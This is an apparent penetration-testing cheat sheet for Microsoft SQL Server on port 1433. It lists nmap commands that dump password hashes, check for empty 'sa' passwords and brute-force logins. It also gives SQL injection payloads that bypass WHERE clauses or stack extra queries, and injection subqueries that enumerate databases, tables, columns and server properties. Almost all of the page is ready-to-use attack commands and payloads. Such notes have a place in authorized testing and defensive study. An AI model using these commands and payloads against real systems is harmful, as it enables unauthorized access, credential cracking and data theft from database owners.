Skip to content

1433 - Pentesting mssql

Enumeration

nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 $IP
nmap -p 1433 --script ms-sql-brute --script-args userdb=customuser.txt,passdb=custompass.txt $IP

Bypass sql where clause

query

Select * from users WHERE user id = 1 AND {USER_PAYLOAD} AND user_type = 'not_admin';
bypass examples
1=1 OR 1=1 -- lorem ipsum
'1'='1' OR '1'='1' -- lorem ipsum
2>1 OR 2>1 -- lorem upsum
1=1); select * from users; -- lorem ipsum
'1'='1'); select * from users; -- lorem ipsum
2>1); select * from users; -- lorem ipsum

Usefull querys

databases

(select TOP 1 STRING_AGG(CONVERT(NVARCHAR(max), name), ',') from master.dbo.sysdatabases) 
tables
(select TOP 1 STRING_AGG(CONVERT(NVARCHAR(max), TABLE_NAME), ',') from INFORMATION_SCHEMA.COLUMNS)
columns
(select TOP 1 STRING_AGG(CONVERT(NVARCHAR(max), COLUMN_NAME), ',') from msdb.INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME = 'users') 
runtimes
(select TOP 1 STRING_AGG(CONVERT(NVARCHAR(max), ROUTINE_NAME), ',') from INFORMATION_SCHEMA.ROUTINES)
functions
(Select APP_NAME())
(Select DB_ID())
(Select DB_NAME())
(Select ORIGINAL_DB_NAME())
(Select SCHEMA_ID())
(Select SCHEMA_NAME()) 
(Select SCOPE_IDENTITY())  
(Select VERSION())
(Select SERVERPROPERTY('BuildClrVersion'))
(Select SERVERPROPERTY('Collation'))  
(Select SERVERPROPERTY('CollationID'))  
(Select SERVERPROPERTY('ComparisonStyle'))  
(Select SERVERPROPERTY('ComputerNamePhysicalNetBIOS'))  
(Select SERVERPROPERTY('Edition'))  
(Select SERVERPROPERTY('EditionID'))  
(Select SERVERPROPERTY('EngineEdition'))  
(Select SERVERPROPERTY('FilestreamConfiguredLevel'))  
(Select SERVERPROPERTY('FilestreamEffectiveLevel'))  
(Select SERVERPROPERTY('FilestreamShareName'))  
(Select SERVERPROPERTY('HadrManagerStatus'))  
(Select SERVERPROPERTY('InstanceDefaultBackupPath'))  
(Select SERVERPROPERTY('InstanceDefaultDataPath'))  
(Select SERVERPROPERTY('InstanceDefaultLogPath'))  
(Select SERVERPROPERTY('InstanceName'))  
(Select SERVERPROPERTY('IsAdvancedAnalyticsInstalled'))  
(Select SERVERPROPERTY('IsBigDataCluster'))  
(Select SERVERPROPERTY('IsClustered'))  
(Select SERVERPROPERTY('IsExternalAuthenticationOnly'))  
(Select SERVERPROPERTY('IsFullTextInstalled'))  
(Select SERVERPROPERTY('IsHadrEnabled'))  
(Select SERVERPROPERTY('IsIntegratedSecurityOnly'))  
(Select SERVERPROPERTY('IsLocalDB'))  
(Select SERVERPROPERTY('IsPolyBaseInstalled'))  
(Select SERVERPROPERTY('IsServerSuspendedForSnapshotBackup'))  
(Select SERVERPROPERTY('IsSingleUser'))  
(Select SERVERPROPERTY('IsTempDbMetadataMemoryOptimized'))  
(Select SERVERPROPERTY('IsXTPSupported'))  
(Select SERVERPROPERTY('LCID'))  
(Select SERVERPROPERTY('LicenseType'))  
(Select SERVERPROPERTY('MachineName'))  
(Select SERVERPROPERTY('NumLicenses'))  
(Select SERVERPROPERTY('PathSeparator'))  
(Select SERVERPROPERTY('ProcessID'))  
(Select SERVERPROPERTY('ProductBuild'))  
(Select SERVERPROPERTY('ProductBuildType'))  
(Select SERVERPROPERTY('ProductLevel'))  
(Select SERVERPROPERTY('ProductMajorVersion'))  
(Select SERVERPROPERTY('ProductMinorVersion'))  
(Select SERVERPROPERTY('ProductUpdateLevel'))  
(Select SERVERPROPERTY('ProductUpdateReference'))  
(Select SERVERPROPERTY('ProductVersion'))  
(Select SERVERPROPERTY('ResourceLastUpdateDateTime'))  
(Select SERVERPROPERTY('ResourceVersion'))  
(Select SERVERPROPERTY('ServerName'))  
(Select SERVERPROPERTY('SqlCharSet'))  
(Select SERVERPROPERTY('SqlCharSetName'))  
(Select SERVERPROPERTY('SqlSortOrder'))  
(Select SERVERPROPERTY('SqlSortOrderName'))  
(Select SERVERPROPERTY('SuspendedDatabaseCount'))